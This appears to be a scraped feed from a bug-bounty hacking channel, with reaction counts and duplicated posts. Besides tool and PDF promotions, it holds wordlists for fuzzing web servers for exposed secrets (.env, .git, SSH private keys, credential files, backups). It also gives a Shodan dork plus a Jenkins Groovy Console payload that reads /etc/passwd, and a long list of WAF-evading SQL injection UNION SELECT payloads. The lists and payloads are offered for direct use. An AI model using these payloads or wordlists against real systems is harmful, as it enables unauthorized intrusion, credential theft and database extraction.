Hello EveryOne Use this Tool
Bounty Prompt: AI-Powered Burp Suite extension
https://bountysecurity.ai/blogs/news/bounty-prompt-ai-powered-burp-suite-extension
Bounty Prompt: AI-Powered Burp Suite extension
https://bountysecurity.ai/blogs/news/bounty-prompt-ai-powered-burp-suite-extension
Bounty Security
Bounty Prompt: AI-Powered Burp Suite extension
Introduction
Bounty Prompt is an open source Burp Suite extension developed by Bounty Security. Leveraging advanced AI technology through Burp AI, this tool enables you to generate intelligent prompts for security testing by analyzing selected HTTP requests…
Bounty Prompt is an open source Burp Suite extension developed by Bounty Security. Leveraging advanced AI technology through Burp AI, this tool enables you to generate intelligent prompts for security testing by analyzing selected HTTP requests…
❤12👍2💩2🔥1
🐧_Bash_Script_Cheatsheet_Automate,_Simplify_and_Command_🎯_.pdf
3.8 MB
🐧 Bash Script Cheatsheet – Automate, Simplify & Command! 🎯💻
🔹 Master Bash Scripting – Automate tasks like a pro! ⚡️
🔹 Learn Commands, Loops, Variables & More – Simplify system management! 🛠
🔹 Essential for Hackers, DevOps & SysAdmins! 🚀
🔹 Master Bash Scripting – Automate tasks like a pro! ⚡️
🔹 Learn Commands, Loops, Variables & More – Simplify system management! 🛠
🔹 Essential for Hackers, DevOps & SysAdmins! 🚀
👍6❤5🔥5👏1
Recon like Pro.pdf
1.3 MB
🔍 Master Networking & Recon – The Backbone of Hacking! 💻🔥
1️⃣ Networking is the key to understanding how data moves.
2️⃣ TCP/IP, DNS, and HTTP help uncover vulnerabilities.
3️⃣ Reconnaissance is where real hacking begins! 🕵️♂️
4️⃣ Better Recon = More Bugs, More Payouts! 💰
🚀 Want to level up your Bug Bounty & Recon skills?
1️⃣ Networking is the key to understanding how data moves.
2️⃣ TCP/IP, DNS, and HTTP help uncover vulnerabilities.
3️⃣ Reconnaissance is where real hacking begins! 🕵️♂️
4️⃣ Better Recon = More Bugs, More Payouts! 💰
🚀 Want to level up your Bug Bounty & Recon skills?
👍14❤10🔥5👏2
Top 25 JavaScript Path Files used to store sensitive information in Web Application
01. /js/config.js
02. /js/credentials.js
03. /js/secrets.js
04. /js/keys.js
05. /js/password.js
06. /js/api_keys.js
07. /js/auth_tokens.js
08. /js/access_tokens.js
09. /js/sessions.js
10. /js/authorization.js
11. /js/encryption.js
12. /js/certificates.js
13. /js/ssl_keys.js
14. /js/passphrases.js
15. /js/policies.js
16. /js/permissions.js
17. /js/privileges.js
18. /js/hashes.js
19. /js/salts.js
20. /js/nonces.js
21. /js/signatures.js
22. /js/digests.js
23. /js/tokens.js
24. /js/cookies.js
25. /js/topsecr3tdonotlook.js
01. /js/config.js
02. /js/credentials.js
03. /js/secrets.js
04. /js/keys.js
05. /js/password.js
06. /js/api_keys.js
07. /js/auth_tokens.js
08. /js/access_tokens.js
09. /js/sessions.js
10. /js/authorization.js
11. /js/encryption.js
12. /js/certificates.js
13. /js/ssl_keys.js
14. /js/passphrases.js
15. /js/policies.js
16. /js/permissions.js
17. /js/privileges.js
18. /js/hashes.js
19. /js/salts.js
20. /js/nonces.js
21. /js/signatures.js
22. /js/digests.js
23. /js/tokens.js
24. /js/cookies.js
25. /js/topsecr3tdonotlook.js
🔥30👍10👀4👏1
Sensitive Files by Fuzzing Key .git Paths.
/.git
/.gitkeep
/.git-rewrite
/.gitreview
/.git/HEAD
/.gitconfig
/.git/index
/.git/logs
/.svnignore
/.gitattributes
/.gitmodules
/.svn/entries
⚡10❤6👍2
Configuration and position-sensitive files
config.php
config.json
config.yaml
config.yml
config.ini
config.xml
config.db
configuration.php
database.yml
database.json
database.ini
database.xml
local.config
web.config
application.properties
application.yml
connections.ini
credentials.json
settings.py
settings.xml
app.config
firebase.json
aws-credentials
👍11❤2🔥1
Important environment files and variables
.env
.env.local
.env.dev
.env.production
.env.staging
.env.testing
.env.example
.env.backup
.env.bak
.env.old
.env~
.env.default
/opt/app/.env
/home/user/.env👍10❤2
Backup files and old versions
index.php.bak
config.old
config.bak
database.sql.gz
database_backup.sql
database_dump.sql
database_export.sql
wp-config.php~
.htpasswd.bak
.htpasswd.old
.htaccess.bak
.htaccess.old
admin.bak
backup.zip
backup.tar.gz
backup.sql
backup_old.sql
old_version.zip
old_config.php
👍12❤3
Log and debug files
debug.log
error.log
access.log
server.log
php_errors.log
trace.log
system.log
log.txt
logs/debug.log
logs/error.log
logs/system.log
logs/app.log👍10❤3
Private key files and API keys
id_rsa
id_rsa.pub
id_dsa
id_ecdsa
id_ed25519
.ssh/id_rsa
.ssh/id_rsa.pub
.ssh/authorized_keys
secrets.json
apikey.txt
google-cloud.json
aws-credentials
jwt_private.pem
jwt_public.pem
private.key
public.key👍12❤5
Miscellaneous files worth testing
composer.lock
composer.json
package.json
package-lock.json
.bash_history
.bashrc
.zshrc
.gitignore
.gitconfig
.gitattributes
.idea/workspace.xml
.vscode/settings.json
.vscode/launch.json
.vscode/tasks.json
Dockerfile
docker-compose.yml
nginx.conf
apache2.conf
httpd.conf
php.ini
robots.txt
sitemap.xml
sitemap_index.xml
crossdomain.xml
security.txt
CORS⚡9👍5🔥4❤3
Exploit RCE via Groovy Console
Shodan: ssl.cert.subject.cn:*.taarget.com http.title:"Dashboard [Jenkins]"
Payload: println "cat /etc/passwd".execute().text
hashtag#BugBounty hashtag#bugbountytips hashtag#RCE
Shodan: ssl.cert.subject.cn:*.taarget.com http.title:"Dashboard [Jenkins]"
Payload: println "cat /etc/passwd".execute().text
hashtag#BugBounty hashtag#bugbountytips hashtag#RCE
👍25🔥7❤2
hello everyone use this my custom and advance Recon Eging
https://haxshadow.github.io/reconengine/
https://haxshadow.github.io/reconengine/
6🔥39❤6👍3🫡3🥰1
Bypass SQL union select
#Bypass #SQL
/*!50000%55nIoN*/ /*!50000%53eLeCt*/
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
+%2F**/+Union/*!select*/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT
UNIunionON+SELselectECT
/**/union/*!50000select*//**/
0%a0union%a0select%09
%0Aunion%0Aselect%0A
%55nion/**/%53elect
uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
%0A%09UNION%0CSELECT%10NULL%
/*!union*//*--*//*!all*//*--*//*!select*/
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
+UnIoN/*&a=*/SeLeCT/*&a=*/
union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa%0A#%0Aselect
union(select (1),(2),(3),(4),(5))
UNION(SELECT(column)FROM(table))
%23xyz%0AUnIOn%23xyz%0ASeLecT+
%23xyz%0A%55nIOn%23xyz%0A%53eLecT+
union(select(1),2,3)
union (select 1111,2222,3333)
uNioN (/*!/**/ SeleCT */ 11)
union (select 1111,2222,3333)
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
/union\sselect/g
/union\s+select/i
/*!UnIoN*/SeLeCT
+UnIoN/*&a=*/SeLeCT/*&a=*/
+uni>on+sel>ect+
+(UnIoN)+(SelECT)+
+(UnI)(oN)+(SeL)(EcT)
+’UnI”On’+'SeL”ECT’
+uni on+sel ect+
+/*!UnIoN*/+/*!SeLeCt*/+
/*!u%6eion*/ /*!se%6cect*/
uni%20union%20/*!select*/%20
union%23aa%0Aselect
/**/union/*!50000select*/
/^.*union.*$/ /^.*select.*$/
/*union*/union/*select*/select+
/*uni X on*/union/*sel X ect*/
+un/**/ion+sel/**/ect+
+UnIOn%0d%0aSeleCt%0d%0a
UNION/*&test=1*/SELECT/*&pwn=2*/
un?<ion sel="">+un/**/ion+se/**/lect+
+UNunionION+SEselectLECT+
+uni%0bon+se%0blect+
%252f%252a*/union%252f%252a /select%252f%252a*/
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f**%2funion%2f**%2fselect%2f**%2f
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*!UnIoN*/SeLecT+
#Bypass #SQL
❤16👍6